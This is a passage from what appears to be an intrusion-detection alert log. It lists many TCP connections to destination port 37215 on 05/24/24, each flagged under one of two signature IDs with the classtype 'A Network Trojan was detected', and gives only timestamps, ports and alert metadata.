              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153894
              SID:2829579
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459501
              SID:2835222
              Source Port:58722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690223
              SID:2835222
              Source Port:56708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300087
              SID:2835222
              Source Port:47014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040598
              SID:2829579
              Source Port:54288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151238
              SID:2835222
              Source Port:53766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101433
              SID:2829579
              Source Port:43092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347740
              SID:2829579
              Source Port:41264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458171
              SID:2829579
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537647
              SID:2835222
              Source Port:40638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194456
              SID:2835222
              Source Port:34152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491905
              SID:2829579
              Source Port:36228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928864
              SID:2829579
              Source Port:40912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605758
              SID:2829579
              Source Port:40202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965811
              SID:2835222
              Source Port:48994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537748
              SID:2829579
              Source Port:56008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964071
              SID:2835222
              Source Port:51538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535500
              SID:2829579
              Source Port:34200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589420
              SID:2835222
              Source Port:46250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099774
              SID:2829579
              Source Port:49062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923996
              SID:2835222
              Source Port:53786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544147
              SID:2835222
              Source Port:35518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443683
              SID:2829579
              Source Port:57036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432201
              SID:2835222
              Source Port:55412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741811
              SID:2829579
              Source Port:43278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487059
              SID:2829579
              Source Port:36996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635807
              SID:2835222
              Source Port:44642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383353
              SID:2835222
              Source Port:35678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798831
              SID:2835222
              Source Port:57260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456332
              SID:2829579
              Source Port:43640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431278
              SID:2829579
              Source Port:35382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456297
              SID:2829579
              Source Port:35338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482955
              SID:2835222
              Source Port:52458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368700
              SID:2829579
              Source Port:44250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875672
              SID:2835222
              Source Port:40352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972573
              SID:2829579
              Source Port:39352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576391
              SID:2829579
              Source Port:56722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970779
              SID:2835222
              Source Port:44802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116330
              SID:2829579
              Source Port:51040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287835
              SID:2835222
              Source Port:44620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827982
              SID:2835222
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965898
              SID:2835222
              Source Port:34756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278699
              SID:2835222
              Source Port:55648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329457
              SID:2835222
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685356
              SID:2829579
              Source Port:55414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078742
              SID:2829579
              Source Port:58048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233369
              SID:2835222
              Source Port:36558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411614
              SID:2829579
              Source Port:50238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592052
              SID:2835222
              Source Port:48534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.632738
              SID:2829579
              Source Port:41848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662019
              SID:2829579
              Source Port:50442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411837
              SID:2835222
              Source Port:47078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531838
              SID:2829579
              Source Port:47414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568324
              SID:2835222
              Source Port:47570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493500
              SID:2835222
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404661
              SID:2829579
              Source Port:48298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685274
              SID:2835222
              Source Port:49428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232569
              SID:2829579
              Source Port:39504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517294
              SID:2835222
              Source Port:60128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193911
              SID:2835222
              Source Port:56448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341151
              SID:2835222
              Source Port:49982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393842
              SID:2835222
              Source Port:56944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858403
              SID:2829579
              Source Port:45294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490503
              SID:2829579
              Source Port:52112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519484
              SID:2829579
              Source Port:55902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161726
              SID:2829579
              Source Port:38520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481997
              SID:2829579
              Source Port:51682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764402
              SID:2829579
              Source Port:45782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796580
              SID:2829579
              Source Port:40214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398324
              SID:2835222
              Source Port:45332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249734
              SID:2829579
              Source Port:45048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446951
              SID:2829579
              Source Port:58348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635669
              SID:2835222
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457820
              SID:2835222
              Source Port:55728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575427
              SID:2835222
              Source Port:53652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487366
              SID:2829579
              Source Port:46136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693223
              SID:2829579
              Source Port:58418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285144
              SID:2829579
              Source Port:58526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411848
              SID:2829579
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622975
              SID:2835222
              Source Port:35334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482104
              SID:2835222
              Source Port:45820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397257
              SID:2829579
              Source Port:56966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926540
              SID:2835222
              Source Port:35660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759685
              SID:2835222
              Source Port:50700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112773
              SID:2835222
              Source Port:44746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572003
              SID:2829579
              Source Port:49396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814780
              SID:2835222
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383342
              SID:2829579
              Source Port:38180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547243
              SID:2829579
              Source Port:45036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409092
              SID:2835222
              Source Port:45902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756467
              SID:2835222
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478949
              SID:2829579
              Source Port:48178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186178
              SID:2829579
              Source Port:47178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249681
              SID:2829579
              Source Port:36088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.068034
              SID:2835222
              Source Port:51478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108674
              SID:2829579
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105673
              SID:2829579
              Source Port:49730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763846
              SID:2835222
              Source Port:36044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079805
              SID:2835222
              Source Port:35140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662648
              SID:2835222
              Source Port:51296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490949
              SID:2829579
              Source Port:52974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579668
              SID:2829579
              Source Port:35968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187434
              SID:2835222
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397210
              SID:2835222
              Source Port:47468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492133
              SID:2829579
              Source Port:56234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493551
              SID:2835222
              Source Port:57940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245566
              SID:2829579
              Source Port:37726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209541
              SID:2829579
              Source Port:33552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233357
              SID:2835222
              Source Port:34580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582505
              SID:2835222
              Source Port:51110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462887
              SID:2829579
              Source Port:53376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481896
              SID:2829579
              Source Port:57812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279191
              SID:2835222
              Source Port:33632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285961
              SID:2835222
              Source Port:46148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726535
              SID:2829579
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150636
              SID:2829579
              Source Port:49140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547720
              SID:2835222
              Source Port:50240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858972
              SID:2829579
              Source Port:41152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402882
              SID:2835222
              Source Port:41060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078200
              SID:2835222
              Source Port:43412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543617
              SID:2829579
              Source Port:34336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061260
              SID:2829579
              Source Port:48810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503380
              SID:2835222
              Source Port:42270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113266
              SID:2835222
              Source Port:35488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152510
              SID:2829579
              Source Port:36898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235458
              SID:2829579
              Source Port:59224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395748
              SID:2829579
              Source Port:52398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482952
              SID:2829579
              Source Port:40022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581713
              SID:2829579
              Source Port:57986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340824
              SID:2829579
              Source Port:53448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096786
              SID:2835222
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549877
              SID:2835222
              Source Port:52748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269381
              SID:2835222
              Source Port:38054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980709
              SID:2835222
              Source Port:49264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128280
              SID:2835222
              Source Port:37022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396257
              SID:2835222
              Source Port:48228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836282
              SID:2829579
              Source Port:58168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520150
              SID:2835222
              Source Port:52606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585084
              SID:2835222
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109390
              SID:2829579
              Source Port:44518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253609
              SID:2835222
              Source Port:52202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128759
              SID:2829579
              Source Port:46996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444682
              SID:2835222
              Source Port:50142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459680
              SID:2835222
              Source Port:57190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764515
              SID:2829579
              Source Port:51118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453810
              SID:2835222
              Source Port:37918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116101
              SID:2835222
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923968
              SID:2835222
              Source Port:58880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313625
              SID:2835222
              Source Port:41892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070687
              SID:2829579
              Source Port:38690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586136
              SID:2835222
              Source Port:54248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864953
              SID:2835222
              Source Port:45118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601284
              SID:2835222
              Source Port:32806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973615
              SID:2829579
              Source Port:58518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992017
              SID:2829579
              Source Port:42292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153952
              SID:2835222
              Source Port:35024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313405
              SID:2829579
              Source Port:44684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882472
              SID:2829579
              Source Port:44006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097801
              SID:2835222
              Source Port:48508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341115
              SID:2835222
              Source Port:59288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623793
              SID:2829579
              Source Port:42540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383310
              SID:2829579
              Source Port:54386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485771
              SID:2829579
              Source Port:34912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040776
              SID:2829579
              Source Port:44542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187565
              SID:2829579
              Source Port:37988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494251
              SID:2835222
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441449
              SID:2829579
              Source Port:48390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857828
              SID:2835222
              Source Port:34044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070559
              SID:2835222
              Source Port:58372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150690
              SID:2829579
              Source Port:45232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480855
              SID:2829579
              Source Port:44440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535468
              SID:2835222
              Source Port:57916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149016
              SID:2835222
              Source Port:51154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448263
              SID:2835222
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308583
              SID:2835222
              Source Port:46386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187451
              SID:2835222
              Source Port:59566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360873
              SID:2835222
              Source Port:49608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517239
              SID:2829579
              Source Port:33244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530952
              SID:2829579
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727268
              SID:2835222
              Source Port:46460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992206
              SID:2835222
              Source Port:44916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858343
              SID:2829579
              Source Port:51186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574640
              SID:2829579
              Source Port:33524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549835
              SID:2835222
              Source Port:34938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642785
              SID:2829579
              Source Port:35098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485280
              SID:2835222
              Source Port:38460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096795
              SID:2829579
              Source Port:34030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044560
              SID:2829579
              Source Port:49486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433655
              SID:2829579
              Source Port:33226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868496
              SID:2835222
              Source Port:34364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062703
              SID:2829579
              Source Port:46826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189056
              SID:2835222
              Source Port:33462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284066
              SID:2829579
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991707
              SID:2829579
              Source Port:42956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578816
              SID:2829579
              Source Port:43318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100676
              SID:2835222
              Source Port:33830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246574
              SID:2829579
              Source Port:47086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
